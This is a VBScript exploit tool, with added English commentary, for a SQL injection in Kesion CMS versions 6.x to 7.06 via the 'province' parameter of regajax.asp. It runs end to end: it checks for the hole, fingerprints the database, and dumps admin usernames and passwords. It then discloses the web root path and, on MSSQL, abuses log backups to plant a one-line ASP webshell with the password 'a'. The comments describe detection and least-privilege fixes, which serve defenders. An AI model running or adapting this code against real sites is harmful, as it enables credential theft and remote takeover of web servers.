科讯kesion 6.x – 7.06 SQL 注射漏洞VBS版利用工具:
'*=========================================================================
'* Intro 科讯kesion 6.x – 7.06 SQL 注射漏洞VBS版利用工具
'* Usage 在命令提示符下输入:Cscript.exe Exp.vbs www.target.com
'* Author 雨中风铃
'* WEB http://hi.baidu.com/yanfei6
'*=========================================================================
' Send a synchronous HTTP GET to PostUrl through MSXML ServerXMLHTTP and return
' the response body as a string.
' There is no error handling: a failed Open/Send raises a runtime error that
' aborts the whole script, and a non-200 status is returned as ordinary text.
' Every call ends with a fixed 2 s pause, so the tool's requests arrive at a very
' regular cadence - something a defender can expect to see in web access logs.
Function PostData(PostUrl)
Dim Http
Set Http = CreateObject("msxml2.serverXMLHTTP")
With Http
.Open "GET", PostUrl, False   ' False = synchronous; blocks until the response is in
.Send()
PostData = .ResponseText
End With
Set Http = Nothing
Wscript.Sleep 2000            ' unconditional 2 s delay after each request (no jitter, no retry)
End Function
' Send a GET to PostUrl and print "[ <status> <statusText> ] <decoded url>".
' Unescape is applied twice because Encode (below) percent-encodes the '%' of
' every %XX pair, so one pass yields %XX and the second the original text.
' Any status other than 200 prints an error and terminates the entire script
' via WScript.Quit; there is no retry. Nothing is assigned to BackDB, so the
' function's return value is always Empty and callers ignore it.
' For defenders: each request this function sends is echoed with its status,
' and the server side sees the same URL in its access log - a 500 on this
' endpoint followed by more requests is the pattern the tool relies on.
Function BackDB(PostUrl)
Dim Http
Set Http = CreateObject("msxml2.serverXMLHTTP")
With Http
.Open "GET", PostUrl, False
.Send()
WScript.Echo "[ " & .Status & " " & .statusText & " ] " & Unescape(Unescape(PostUrl))
If .Status<>200 Then
WScript.Echo "日志差异备份出错!"   ' runtime message ("log differential backup failed"); left as-is
WScript.Quit
End If
End With
Set Http = Nothing
Wscript.Sleep 2000   ' same fixed 2 s pacing as PostData
End Function
' Fetch PostUrl with PostData and report whether the marker string strSign
' occurs anywhere in the response body (boolean-style probe; case-sensitive
' because InStr is used without a compare argument).
' strData is never declared with Dim - the file has no Option Explicit, so it
' is created implicitly on first assignment.
Function IsSuccess(PostUrl, strSign)
strData = PostData(PostUrl)
'Wscript.Echo strData
if InStr(strData, strSign) >0 then
IsSuccess = True
Else
IsSuccess = False
End If
End Function
' Double percent-encode strData: every character becomes "%25" followed by
' Hex(Asc(c)), i.e. the text "%XX" with its own '%' encoded as %25, and a
' trailing "%2500" (an encoded NUL) is appended.
' Hex() emits no leading zero, so a character with a code below 16 would not
' form a two-digit %XX pair; Asc returns the local code-page value for
' non-ASCII input. Both limits are simply inherited by the callers below.
' A defender looking at access logs will see parameters made entirely of
' "%25" sequences - that double-encoding is itself a usable signature.
Function Encode(strData)
Dim strTemp, I
For I = 1 To Len(strData)
strTemp = strTemp & "%25" & Hex(Asc(Mid(strData, I, 1)))
Next
Encode = strTemp & "%2500"
End Function
' Run the regular expression patrn over strData (case-insensitive, global) and
' return the first capture group of every match, each one prefixed by vbCrLf.
' Matches with an empty overall value are skipped. The caller strips the
' vbCrLf again when it expects a single value (see the main script).
' Only strTemp is declared; re, Matches and i are implicit (no Option Explicit).
Function getData(strData, patrn)
dim strTemp
Set re = New RegExp
re.Pattern = patrn
re.IgnoreCase = True
re.Global = True
Set Matches = re.Execute(strData)
For i = 0 To Matches.Count - 1
If Matches(i).Value<>"" Then
strTemp = strTemp & vbCrLf & Matches(i).SubMatches(0)   ' SubMatches(0) = first capture group
End If
Next
getData = strTemp
End Function
' Main script. Usage: one argument, the site base URL (see the Usage echo).
' Root cause exercised here: the "province" parameter of
' user/reg/regajax.asp?action=getcityoption is concatenated into a SQL query
' unparameterized, so a UNION SELECT and, on MSSQL, stacked statements run.
' The fix on the application side is a parameterized query; on the database
' side, the account used by the site should not hold ALTER DATABASE, CREATE
' TABLE or BACKUP privileges, which is what the final stage depends on.
If WScript.Arguments.Count <> 1 Then
WScript.Echo "Usage: Cscript.exe Exp.vbs 要检测的网址"
WScript.Echo "Example: Cscript.exe Exp.vbs http://www.kesion.com/"
WScript.Quit
End If
' Normalise the base URL: backslashes to slashes, ensure a trailing "/".
attackUrl = WScript.Arguments(0)
attackUrl = Replace(attackUrl,"\","/")
If Right(attackUrl , 1) <> "/" Then
attackUrl = attackUrl & "/"
End If
' The vulnerable endpoint; every request below is this URL plus an encoded payload.
' Logging/WAF note: this path with a double-encoded (%25...) "province" value is
' the single most specific indicator of this tool.
strHoleUrl = attackUrl & "user/reg/regajax.asp?action=getcityoption&province="
' Stage 1 - existence check: a UNION against KS_Admin that reflects the marker "ExistHole".
strTestUrl = strHoleUrl & Encode("' union Select 1, 'ExistHole' From KS_Admin")
If IsSuccess(strTestUrl, "ExistHole") Then
WScript.Echo "恭喜!存在漏洞"
Else
WScript.Echo "没有检测到漏洞"
WScript.Quit
End If
' Stage 2 - engine fingerprint: a FROM-less SELECT is valid on MSSQL but not on
' Access, so its success/failure decides bAccess.
strTestUrl = strHoleUrl & Encode("' union Select 1, 'ExistHole'")
If IsSuccess(strTestUrl, "ExistHole") Then
WScript.Echo "数据库为:MSSQL"
bAccess = False
Else
WScript.Echo "数据库为:ACCESS"
bAccess = True
End If
' Stage 3 - credential dump: up to 10 KS_Admin rows, scraped from the
' value="..." attributes of the returned <option> markup.
strTestUrl = strHoleUrl & Encode("' union Select top 10 AdminID,UserName+'<->'+PassWord From KS_Admin")
WScript.Echo "用户名<->密码:" & getData(PostData(strTestUrl), "value=""([^""]+)")
' Stage 4 - physical path disclosure: a bare "%i" is sent (not via Encode);
' presumably it provokes an error page whose text names ../../KS_Cls/Kesion.EscapeCls.asp,
' and the path in front of that is captured. Verbose ASP error pages reaching
' the client are the information leak this depends on.
strTestUrl = strHoleUrl & "%25i"
strWebPath = getData(PostData(strTestUrl), ">([^>]+)\.\./\.\./KS_Cls/Kesion\.EscapeCls\.asp")
strWebPath = Replace(strWebPath, vbCrLf, "")
If strWebPath <> "" Then
WScript.Echo "网站绝对路径:" & strWebPath
End If
' Stage 5 (MSSQL only) - current database name via db_name().
' On Access strDatabase is never assigned and stays Empty, which compares equal
' to "" in the guard below, so the final stage is skipped.
If Not bAccess Then
strTestUrl = strHoleUrl & Encode("' union Select 1, db_name()")
strDatabase = getData(PostData(strTestUrl), "value=""([^""]+)")
strDatabase = Replace(strDatabase, vbCrLf, "")
WScript.Echo "MSSQL数据库名为:" & strDatabase
End If
' Stage 6 - file write through a log backup: the database is switched to FULL
' recovery, a scratch table receives the hex-encoded file body as image data,
' and "backup log ... to disk" is pointed at <web root>\2.asp so the backup
' file lands inside the web root, then the table is dropped and recovery reset.
' Each step goes through stacked statements (';...) and BackDB quits on any
' non-200 reply. The path and database name from stages 4-5 are both required.
' Detection/mitigation: recovery-model changes, CREATE/DROP TABLE and BACKUP LOG
' TO DISK issued by the web application's login are all auditable in SQL Server;
' an unexpected 2.asp under user/reg/ on disk is the artefact to look for, and
' a least-privilege application login blocks this stage entirely.
WScript.Echo "正在进行数据库差异备份:"
If strWebPath <> "" And strDatabase <> "" Then
BackDB(strHoleUrl & Encode("';alter database " & strDatabase & " set RECOVERY FULL"))
BackDB(strHoleUrl & Encode("';create table cmd (a image)"))
BackDB(strHoleUrl & Encode("';backup log " & strDatabase & " to disk = 'c:\cmd' with init"))   ' first backup, discarded, to shrink the log
BackDB(strHoleUrl & Encode("';insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253E)"))   ' hex literal = file body written next
BackDB(strHoleUrl & Encode("';backup log " & strDatabase & " to disk = '" & strWebPath & "2.asp'"))
BackDB(strHoleUrl & Encode("';drop table cmd"))
BackDB(strHoleUrl & Encode("';alter database "& strDatabase & " set RECOVERY SIMPLE"))
End If
' Final echo names the written file; it is printed whether or not stage 6 ran.
WScript.Echo "Execute一句话木马地址为:" & attackUrl & "user/reg/2.asp"
WScript.Echo "密码为:a" |